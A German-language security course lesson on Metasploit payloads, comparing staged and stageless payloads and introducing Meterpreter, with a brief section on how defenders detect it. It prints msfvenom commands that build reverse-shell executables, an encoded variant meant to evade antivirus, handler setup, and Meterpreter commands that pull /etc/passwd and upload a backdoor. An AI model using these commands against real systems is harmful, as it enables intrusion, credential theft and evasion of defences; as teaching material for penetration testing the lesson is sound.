0Pricing
Cyber Security Academy · Lektion

Payloads: Staged vs. Stageless und Meterpreter

Wählen Sie den passenden Payload für ein Szenario und verwenden Sie Meterpreter für die Post-Exploitation.

Payloads: Staged vs. Stageless und Meterpreter ist eine kostenlose Cyber Security Academy-Lektion auf CoddyKit. Dies ist Lektion 3 von 4. Du kannst die komplette Lektion unten kostenlos lesen – dann übst du sie direkt im Browser mit einem integrierten Code-Editor und einem KI-Tutor rund um die Uhr. Sie ist Teil des Cyber Security Academy-Lernpfads, und dein Fortschritt wird über Web und CoddyKit-App synchronisiert. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.

Was ist ein Payload?

Ein Payload ist der Code, der nach einem erfolgreichen Exploit auf dem Ziel ausgeführt wird. Er bestimmt, was der Angreifer erhält: eine Shell, Befehlsausführung, Dateizugriff oder einen voll ausgestatteten Agenten wie Meterpreter.

Staged- und Stageless-Payloads

Stageless-Payloads (/) enthalten alles in einer einzigen Binärdatei – sie sind größer, aber einfacher und benötigen nach der ersten Übertragung keinen Netzwerk-Callback. Staged-Payloads (//) senden zunächst einen winzigen Stager, der die zweite Stufe vom Handler herunterlädt.

# Stageless (single slash naming):
windows/x64/shell_reverse_tcp

# Staged (double slash naming):
windows/x64/shell/reverse_tcp
#                 ^
#                 stage 2 downloaded after stager connects

Wann welcher Payload verwendet wird

Verwenden Sie stageless, wenn das Ziel nach dem ersten Exploit keinen Internetzugang oder Zugriff auf den Handler hat – der Payload muss in sich abgeschlossen sein. Verwenden Sie staged, wenn Sie einen kleineren initialen Payload wünschen und eine zuverlässige Verbindung zum Handler vorhanden ist.

Meterpreter im Überblick

Meterpreter ist der fortschrittliche Payload von Metasploit. Er läuft vollständig im Arbeitsspeicher, verwendet verschlüsselte Kommunikation und stellt eine umfangreiche API bereit: Dateisystemzugriff, Prozessmigration, Keylogging, Screenshot-Erstellung und Pivoting.

msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.10
msf6 > set LPORT 4444
msf6 > run

Meterpreter-Befehle

Wichtige Meterpreter-Befehle für die Post-Exploitation umfassen Systeminformationen, Prozesslisten, Dateioperationen und Netzwerkfunktionen.

meterpreter > sysinfo          # system information
meterpreter > getuid           # current user
meterpreter > ps               # process list
meterpreter > download /etc/passwd
meterpreter > upload backdoor.sh /tmp/
meterpreter > shell            # drop to OS shell

Prozessmigration

Migrieren Sie den Meterpreter-Prozess in einen stabileren oder weniger verdächtigen Prozess (z. B. explorer.exe unter Windows). Dadurch können auch Berechtigungen erweitert werden, wenn die Migration in einen Prozess mit höheren Rechten erfolgt.

meterpreter > ps
meterpreter > migrate 1234     # migrate to PID 1234

# Migrate to explorer.exe for stability
# Avoids termination if original process exits

Payloads mit msfvenom erzeugen

msfvenom erzeugt eigenständige Payload-Dateien (EXE, ELF, APK, Shellcode) zur Übertragung per Phishing, USB-Datenträger oder Web-Shell in autorisierten Tests.

# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -f exe -o payload.exe

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -f elf -o payload.elf

Multi/Handler zum Empfangen von Shells

Das Auxiliary-Modul multi/handler empfängt Reverse-Shell-Verbindungen. Konfigurieren Sie es vor der Übertragung des Payloads mit demselben Payload, LHOST und LPORT, die Sie in msfvenom verwendet haben.

msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 0.0.0.0
msf6 > set LPORT 4444
msf6 > run -j      # run as background job

Grundlagen von Kodierung und Umgehung

msfvenom-Encoder können Payloads verschleiern, um eine grundlegende signaturbasierte AV-Erkennung zu umgehen. Hinweis: Moderne EDR-Systeme verwenden Verhaltenserkennung – Encoder allein reichen gegen fortschrittliche Schutzmechanismen nicht aus.

msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.10 LPORT=4444 \
  -e x64/xor_dynamic -i 5 \
  -f exe -o encoded_payload.exe

Bind- und Reverse-Payloads

Reverse-Payloads verbinden sich vom Ziel zum Angreifer (besser geeignet für NAT und Firewalls). Bind-Payloads lauschen auf dem Ziel – der Angreifer verbindet sich mit ihnen. Reverse wird in den meisten Szenarien bevorzugt.

Payload-Erkennung durch Verteidiger

Verteidiger erkennen Meterpreter anhand von Netzwerk-Signaturen (C2-Datenverkehrsmuster), durch Speicher-Scanning (Artefakte der reflektiven DLL-Injektion) und mittels Verhaltensanalyse (Process Hollowing, ungewöhnliche Eltern-Kind-Beziehungen).

Kurzer Test

Wodurch unterscheidet sich ein Staged-Payload in Metasploit von einem Stageless-Payload?

Zusammenfassung: Payloads und Meterpreter

Wählen Sie Staged-Payloads für eine geringe anfängliche Größe und Stageless-Payloads für eine in sich abgeschlossene Übertragung. Meterpreter ist der leistungsfähigste Payload für die Post-Exploitation: Er läuft im Arbeitsspeicher, kommuniziert verschlüsselt und ist erweiterbar. Verwenden Sie msfvenom zum Erzeugen eigenständiger Binärdateien und konfigurieren Sie immer multi/handler, um Callbacks zu empfangen.

Häufig gestellte Fragen

Ist die Lektion „Payloads: Staged vs. Stageless und Meterpreter“ kostenlos?

Ja — der vollständige Text von „Payloads: Staged vs. Stageless und Meterpreter“ ist hier im Web kostenlos zu lesen. Um sie interaktiv zu üben (integrierter Code-Editor und 24/7 KI-Tutor) und den Rest des Cyber Security Academy-Kurses freizuschalten, upgrade auf CoddyKit PRO. Der Cyber Security Academy-Kurs umfasst insgesamt 4 Lektionen.

Was lerne ich in „Payloads: Staged vs. Stageless und Meterpreter“?

Wählen Sie den passenden Payload für ein Szenario und verwenden Sie Meterpreter für die Post-Exploitation. Du übst Cyber Security Academy mit praktischem Code, den du direkt im Browser ausführst, und ein 24/7 KI-Tutor beantwortet deine Fragen während du die Lektion bearbeitest.

Brauche ich Erfahrung, um Cyber Security Academy zu starten?

Keine Vorkenntnisse erforderlich. Cyber Security Academy auf CoddyKit ist für Anfänger bis fortgeschrittene Lernende strukturiert, sodass du hier starten oder von Anfang an beginnen und in deinem eigenen Tempo voranschreiten kannst. Dies ist Lektion 3 von 4.

Wie lange dauert die Lektion „Payloads: Staged vs. Stageless und Meterpreter“?

Die meisten CoddyKit-Lektionen dauern etwa 5–10 Minuten. Jede ist kompakt und interaktiv, sodass du stetig Fortschritte machst und genau dort weitermachst, wo du aufgehört hast – im Web und in der App.

Kann ich in dieser Cyber Security Academy-Lektion Code schreiben und ausführen?

Ja. Jede Cyber Security Academy-Lektion enthält einen integrierten Code-Editor, sodass du echten Code direkt in deinem Browser schreibst und ausführst und sofort KI-Feedback erhältst — ohne lokale Einrichtung erforderlich.

Alle Lektionen in diesem Kurs

  1. Metasploit-Architektur und msfconsole
  2. Eine bekannte Schwachstelle ausnutzen
  3. Payloads: Staged vs. Stageless und Meterpreter
  4. Post-Exploitation: Pivoting und Persistenz
← Zurück zu Cyber Security Academy